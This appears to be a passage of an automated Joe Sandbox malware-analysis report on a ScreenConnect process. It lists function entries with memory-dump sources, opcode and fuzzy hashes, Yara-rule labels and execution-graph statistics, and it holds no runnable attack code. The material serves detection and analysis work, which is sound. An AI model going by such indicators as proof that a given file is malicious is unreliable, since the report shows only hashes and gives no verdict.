                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ae754171d914f831f36d85a29aaf349ea3531aa80da161833d5f60b67da6f05e
                                                                                                                                                                                                                                                        • Instruction ID: c066c4cf4c36e6d6fb7b0568e5de9373ecf4cf15be18f6f2f7e610ce5bc4ed91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae754171d914f831f36d85a29aaf349ea3531aa80da161833d5f60b67da6f05e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29E092212097965FD712D668F8402CC2BB1AE83214B4889EAD48197543CBA4AA4E83A2
                                                                                                                                                                                                                                                        Function 040D5021 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 04063c4ad1bd6d9094055a9d27566cfb4612d8a814f6bd6c47555f0144c7d083
                                                                                                                                                                                                                                                        • Instruction ID: 3e88afa09377992ca47afc0f92bec6ae42a5c6d1fe162bd12f1a137bc81cba4d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04063c4ad1bd6d9094055a9d27566cfb4612d8a814f6bd6c47555f0144c7d083
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96E012F6D052548BC750CFA888414DDBFE0EB59224715869DD479DB252F7329A03DFC1
                                                                                                                                                                                                                                                        Function 01915930 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d14dc4a2998d75b0e1699276553c98196aebb7f4611520f2825fd4b5892a5a36
                                                                                                                                                                                                                                                        • Instruction ID: 7fbe75781380dc6ceb0a3f890b5c584022ff928b46213a3ef0dd5ca0283dd814
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d14dc4a2998d75b0e1699276553c98196aebb7f4611520f2825fd4b5892a5a36
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4E086353011105783047A7DE94845E7B9AEFD9221320413DE556E3389DE789C02C791
                                                                                                                                                                                                                                                        Function 01915979 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c90dd71ce372ce3fcbc49355d432ba3b705758bf8f2e5b9354349fd0aced6569
                                                                                                                                                                                                                                                        • Instruction ID: 54cd4c75e0c00c8de5789b2673c6f704a6ef5a92413bd19ff75b213fa21abb1c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c90dd71ce372ce3fcbc49355d432ba3b705758bf8f2e5b9354349fd0aced6569
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48E0DF72D04288DFCB01EFB4EA5118D7B74EF46204B51C4DEC849E7222DA345F058B51
                                                                                                                                                                                                                                                        Function 01915400 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e5a08d4369c00559471e747461093e3ab40972714a1264f2cae2eaa8d399280
                                                                                                                                                                                                                                                        • Instruction ID: df3c43542d6178a9c54aae78aa116ff2ac9ca9aa9289dec08e1b04e749e1426e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e5a08d4369c00559471e747461093e3ab40972714a1264f2cae2eaa8d399280
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DE08C70788206CFE711CB68E8509413BB8BF52A1231740E6D948CB2B3D735D893CB11
                                                                                                                                                                                                                                                        Function 040D55C8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                                        • Instruction ID: 52fd74eeb6b2a5bf83b7afabc32c1256afd7894bf10b77313eb7f576e609a244
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8E0EC71E10219DF8B80EFBDD80559DBBF8EF08651B1040A6E91DE7311F3309A108BD1
                                                                                                                                                                                                                                                        Function 0191ED28 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a46447b96bc1d1b17368763fcb1f8de2e2e242bcf9e67ba768340c3495d39b21
                                                                                                                                                                                                                                                        • Instruction ID: f8e44123ac9094279a928b716c56456db09730faac7ec45aff57968b16ae580a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a46447b96bc1d1b17368763fcb1f8de2e2e242bcf9e67ba768340c3495d39b21
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE08632808B498FC702AF68D459894BB74EED1200B05D68FD84D5F023FB7096D5D752
                                                                                                                                                                                                                                                        Function 040D45A0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5f3d698dafb0339d94a6919cc7d41f719fb34191ad8f59f47cde94ddc6af201b
                                                                                                                                                                                                                                                        • Instruction ID: cf09edd8b9a5a3687d7b269d5474db5169a4ef1ceb9ff047b0a6db647bc25301
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f3d698dafb0339d94a6919cc7d41f719fb34191ad8f59f47cde94ddc6af201b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96D05E353906148FC748EB3DE44496E3BDAAF8962035180A4E409CB321DE60EC0187D0
                                                                                                                                                                                                                                                        Function 040D5563 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2427ef4dfe57c5009ed5640f899d7b2813fc1d65b8e9d03c886a79a614201d34
                                                                                                                                                                                                                                                        • Instruction ID: 01fe044031dcda0b86a6f1afdcdc93d83af0d519e787db2f8e14c95d80fa723a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2427ef4dfe57c5009ed5640f899d7b2813fc1d65b8e9d03c886a79a614201d34
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EE01271E0110DFFCB40DFA4F98059C7BB5EB5D204B504598D409E7310EA316F429B51
                                                                                                                                                                                                                                                        Function 040D55C0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 049f2dd95711ce9b7537af655bf0352359695e9fcc4950ae1177acf7ec33e618
                                                                                                                                                                                                                                                        • Instruction ID: 5d23cfaed0ccdad24d00a7ba7af443dae4a2e399f5cc25c189e7c941ac37f82d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 049f2dd95711ce9b7537af655bf0352359695e9fcc4950ae1177acf7ec33e618
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6E08C35A44255DFCB80DBBCD8048CDBFB0EB092B071446D9E56AEB2A2E3355A16CB41
                                                                                                                                                                                                                                                        Function 01915410 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9dbef6d6b4d8535d2300c257a5e326a29d6f326f2dacb730468284c6efa952f0
                                                                                                                                                                                                                                                        • Instruction ID: 06cf7de0d6a0bf33b5309bdfebe27cdcff3a60b6386d35604988a1d6d243d7c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dbef6d6b4d8535d2300c257a5e326a29d6f326f2dacb730468284c6efa952f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07D05E3038021CCFAA68CE29D440A1137E87F86E123A300A5D90ACB376DA30EC82CB52
                                                                                                                                                                                                                                                        Function 01915988 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ebfbd4be44d70b6e09e118202d23f835b5232f7a7e247a0e6f6313ba0742be43
                                                                                                                                                                                                                                                        • Instruction ID: 11d73887845875533cc40d7282a7d5f97b24031af0b3aa81629442ab61f416a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebfbd4be44d70b6e09e118202d23f835b5232f7a7e247a0e6f6313ba0742be43
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CD01271901109EFCF00EFA4E95065DB7B9EB45204B90C5A9D849E3300DE316F049B51
                                                                                                                                                                                                                                                        Function 040D0C58 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e90476dad26df2089d6c7c343f395c6007ebac43930cfd2a68b5b9b4ed5f8f2d
                                                                                                                                                                                                                                                        • Instruction ID: a1911d2f5b6fa1e73e044f4cc841a09dc32f3b701e39efed3f7b0027d665b45c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e90476dad26df2089d6c7c343f395c6007ebac43930cfd2a68b5b9b4ed5f8f2d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76D01270D05109FFDB00DFA8D94059D77B9EB45204B5085ACD409E3300DA316F019B95
                                                                                                                                                                                                                                                        Function 040D5568 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1351eae6b4ff8b93b3a100862cbeaf442fb4be931cd73cb8fc58909fe129fb8d
                                                                                                                                                                                                                                                        • Instruction ID: 37af0040b478089adaf178566118b6cfe2137bd2d9d1c4833a4c3a230878a5e8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1351eae6b4ff8b93b3a100862cbeaf442fb4be931cd73cb8fc58909fe129fb8d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0D01770E0020DEFCB40DFA8E94059DBBF9EB59204B5045A8D809E7210EA317F019B91
                                                                                                                                                                                                                                                        Function 0191B9A9 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e375a6f3271979ccc3963342919991701e8f11f4b870e5a32eb0d4d41216f66d
                                                                                                                                                                                                                                                        • Instruction ID: 48adebdaa6e6e771734445fdf1df99ec0716985de8ca1f5d1f625e33f19b3a06
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e375a6f3271979ccc3963342919991701e8f11f4b870e5a32eb0d4d41216f66d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BC08076B440104FC344D71CDC51515E7D39BD524473DC4BB6509D77A5D931CD038384
                                                                                                                                                                                                                                                        Function 0191ED38 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1a8fc6bc692e78b5320d3735b381e5b2a28f3a38f9f46600df1d348115205569
                                                                                                                                                                                                                                                        • Instruction ID: e5110b4525cac616f351ec3cb148442d6443b3c0e1a2ea922d401de2607383d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a8fc6bc692e78b5320d3735b381e5b2a28f3a38f9f46600df1d348115205569
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AD09E3181470999C700BA68D454469B778EAD5200F00D65EE44956111EB70A6909681
                                                                                                                                                                                                                                                        Function 0191DEF8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bbe76d85dfdf73a28530777428e052972f0221a9cbd03c30016e7b37a7b978ab
                                                                                                                                                                                                                                                        • Instruction ID: 1264ebb54594db2b803b0380d87d1df515db4cdf6b5474e4e63f0113f723a162
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbe76d85dfdf73a28530777428e052972f0221a9cbd03c30016e7b37a7b978ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D0172440E3C45FDB02CB24A0980447FB0EA4320471988DFC484E7447C2758545CF52
                                                                                                                                                                                                                                                        Function 040D2E50 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1814610822.00000000040D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_40d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a8eaaf2e6bb106ee5da25962f8b7882b847ff640b255d11871b6b1761f8b6485
                                                                                                                                                                                                                                                        • Instruction ID: 600c430d5d436005edca9d3e4dc56e4dff2a9699aea70cf34e4a96dced5f8f38
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8eaaf2e6bb106ee5da25962f8b7882b847ff640b255d11871b6b1761f8b6485
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6C08CB84147438FF3001A00848239177A0FD213113A2048DC8C085122C71C90138740
                                                                                                                                                                                                                                                        Function 0191E662 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                        • Instruction ID: 8ecd76cd7f1403fdd00de3eec8c4ceab7a6ba169a6f326fa5a18981b47b18b1a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1A002752010009BC244DB54C995C15F765EFE5319728C4AEA9198B256CF33ED13DA54

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 0191B598 Relevance: 5.3, Strings: 4, Instructions: 306COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        • Opcode ID: 30cfe57eed650598538616e06f0ddda3c9bcc3fe9064ef5e952f61c5521d2738
                                                                                                                                                                                                                                                        • Instruction ID: 7173853acd06b393258bb0e7ecf4335f1e477b5ea71626b89837c742a0b275e4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30cfe57eed650598538616e06f0ddda3c9bcc3fe9064ef5e952f61c5521d2738
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CC15B747003058FD705DF68D8989AAB7B2FF89210351C6AED906AF365DB74EC468F90
                                                                                                                                                                                                                                                        Function 0191B5A8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1810423733.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1910000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ;$K$[$[
                                                                                                                                                                                                                                                        • API String ID: 0-2650379400
                                                                                                                                                                                                                                                        • Opcode ID: e77dae531405568ae3567b2c778b1228ea698d6dbf51c887af5e375c66d6f02d
                                                                                                                                                                                                                                                        • Instruction ID: f1439dfc768f633ffaf0f9f9c68af3ae80f4dff8f7e27bb43bede1bd75f52b13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e77dae531405568ae3567b2c778b1228ea698d6dbf51c887af5e375c66d6f02d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72B13A747002058FD704DF68D89899AB7B2FF89210351C6AEE906AF365DB74EC468F94

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:5
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 18141 7ff7bfec8014 18143 7ff7bfec801d 18141->18143 18142 7ff7bfec8082 18143->18142 18144 7ff7bfec80f6 SetProcessMitigationPolicy 18143->18144 18145 7ff7bfec8152 18144->18145

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF7C01E4C4D Relevance: 2.7, Strings: 1, Instructions: 1426COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                                                                                                                        • Opcode ID: a7061f5e47cf51f62b41f2e6a14345e218979ebae6168f3e818fa8af2f29a2b5
                                                                                                                                                                                                                                                        • Instruction ID: b8fcd6ad8262a8c19b27c1be765cbebe3c5e17e66378b82c97cf9444e36379d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7061f5e47cf51f62b41f2e6a14345e218979ebae6168f3e818fa8af2f29a2b5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78B2D67180D7C64FD366AF24981A6ADBBE0EF46720F4405F9D499CB2E3EA18750683E1
                                                                                                                                                                                                                                                        Function 00007FF7C01D69FB Relevance: 1.8, Strings: 1, Instructions: 597COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
